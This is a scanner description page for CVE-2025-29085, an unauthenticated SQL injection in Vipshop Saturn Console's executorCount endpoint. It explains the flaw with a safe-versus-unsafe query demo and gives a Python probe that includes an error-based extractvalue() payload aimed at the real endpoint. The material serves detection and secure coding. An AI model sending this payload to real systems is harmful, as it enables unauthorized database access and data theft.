CVE-2025-29085 Scanner
CVE-2025-29085 Scanner - SQL Injection (SQLi) vulnerability in Vipshop Saturn Console
Short Info
Level: Critical
Single Scan: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 10 days
Scan only one: Domain, Subdomain, IPv4
Toolbox: -
Vipshop Saturn Console is a distributed job scheduling platform developed and used internally by Vipshop and released as open source for broader use. It is commonly deployed in enterprise environments to manage job execution across clustered environments: administrators use the console interface to monitor job status, control execution, and retrieve execution metrics, which makes it integral to workflow automation and batch processing in large-scale systems. As with many administrative consoles, Saturn Console exposes web-based interfaces that accept numerous user-supplied parameters. Where those parameters are not validated before reaching a database query, they become targets for injection attacks.
This scanner targets a critical SQL injection vulnerability in Vipshop Saturn Console versions up to and including 3.5.1. The flaw lies in the `zkClusterKey` parameter of the `/console/dashboard/executorCount` endpoint: the value is neither sanitized nor bound through a parameterized query, so a crafted value alters the SQL statement and allows arbitrary SQL to be executed. The endpoint is reachable without authentication, meaning attackers do not need console credentials to exploit it. The severity is elevated by the potential for full database compromise and data exfiltration and, depending on the database's configuration and privileges, code execution through database functions.
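To make the root cause concrete, the following is an added illustration written for this page; it is not Saturn Console's code (the real project is written in Java) and the `executor` table and its rows are constructed here. It contrasts the vulnerable pattern, where the `zkClusterKey` value is spliced into the SQL text, with a parameterized query that treats the same value purely as data:

```python
import sqlite3


def make_db():
    """Build an in-memory stand-in for an executor table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE executor (id INTEGER PRIMARY KEY, zk_cluster_key TEXT, name TEXT)"
    )
    conn.executemany(
        "INSERT INTO executor (zk_cluster_key, name) VALUES (?, ?)",
        [("prod", "exec-1"), ("prod", "exec-2"), ("staging", "exec-3")],
    )
    return conn


def count_executors_unsafe(conn, zk_cluster_key):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so a quote in the value terminates the literal and the rest is parsed as SQL.
    sql = f"SELECT COUNT(*) FROM executor WHERE zk_cluster_key = '{zk_cluster_key}'"
    return conn.execute(sql).fetchone()[0]


def count_executors_safe(conn, zk_cluster_key):
    # Hardened pattern: the value is bound as a parameter and never parsed as SQL.
    sql = "SELECT COUNT(*) FROM executor WHERE zk_cluster_key = ?"
    return conn.execute(sql, (zk_cluster_key,)).fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    injected = "x' OR '1'='1"
    # The unsafe query returns every row for the injected value; the safe one returns none.
    print("unsafe:", count_executors_unsafe(db, injected))
    print("safe:  ", count_executors_safe(db, injected))
```

The injected value `x' OR '1'='1` turns the unsafe query's `WHERE` clause into `zk_cluster_key = 'x' OR '1'='1'`, which matches the whole table; the parameterized query looks for a cluster literally named `x' OR '1'='1` and finds nothing. The same difference is what separates the vulnerable Saturn Console endpoint from a fixed one.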
The scanner probes for the flaw by sending a request whose `zkClusterKey` value injects a SQL payload built around MySQL's `extractvalue()` function. The payload hands `extractvalue()` a deliberately invalid XPath expression that embeds the output of `version()`; the database rejects the expression and echoes it back in its error message, which the application then returns in the response body. Detection therefore looks for the known error string (`XPATH syntax error`) in the HTTP response and captures the version string that accompanies it. A match confirms both the presence of the flaw and that the injected SQL was actually executed. Because the leaked metadata arrives directly in the error text, this is an error-based rather than blind injection technique: a single request is enough to read data out of the database.
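The detection logic described above, as an added example for this page rather than the scanner's own code: it builds the probe URL for the endpoint and parameter named in the advisory and matches the MySQL error text in a response body. The payload shape is the standard `extractvalue()` error-based probe and is an assumption about what such a request looks like, not a copy of the scanner's request; the two response bodies are constructed here to stand in for a vulnerable and a patched console.

```python
import re
from urllib.parse import urlencode, urljoin

# Endpoint and parameter named in the advisory.
ENDPOINT = "/console/dashboard/executorCount"
PARAM = "zkClusterKey"

# Assumed probe (standard error-based form, not the scanner's exact request):
# extractvalue() gets an XPath expression built from version() wrapped in '~'
# markers; MySQL rejects it and echoes the expression in an XPATH syntax error.
PAYLOAD = "' AND extractvalue(1,concat(0x7e,version(),0x7e)) AND '1'='1"

# Matches the MySQL error text and captures the leaked version between the markers.
ERROR_RE = re.compile(r"XPATH syntax error: '~([^~']*)~'")


def build_probe_url(base_url):
    """Return the GET URL the probe would request; the payload is URL-encoded."""
    return urljoin(base_url, ENDPOINT) + "?" + urlencode({PARAM: PAYLOAD})


def check_response(body):
    """Return the leaked database version if the body shows error-based SQLi, else None."""
    match = ERROR_RE.search(body)
    return match.group(1) if match else None


# Constructed response bodies standing in for what the console might return.
VULNERABLE_BODY = '{"success":false,"message":"XPATH syntax error: \'~8.0.32~\'"}'
PATCHED_BODY = '{"success":true,"obj":{"prod":2}}'


if __name__ == "__main__":
    print(build_probe_url("https://saturn.example/"))  # hypothetical host
    for label, body in (("vulnerable", VULNERABLE_BODY), ("patched", PATCHED_BODY)):
        print(label, "->", check_response(body))
```

Two caveats a practitioner should keep in mind: `extractvalue()` only exists on MySQL and MariaDB, so a console backed by another database will not produce this error even if the parameter is injectable, and MySQL truncates the text it echoes in the XPATH error to 32 characters, which is why the probe leaks short values such as `version()` rather than whole rows.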
Successful exploitation of this vulnerability could give attackers full access to the underlying database, including sensitive information such as credentials, application configuration, and proprietary data. In environments with weak isolation, that access may enable lateral movement and compromise of other services. Depending on the database's capabilities and privileges, the flaw can also be a pivot to remote code execution. Because the endpoint is reachable without authentication, the vulnerability poses an immediate and severe risk to any Saturn Console deployment exposed to untrusted networks.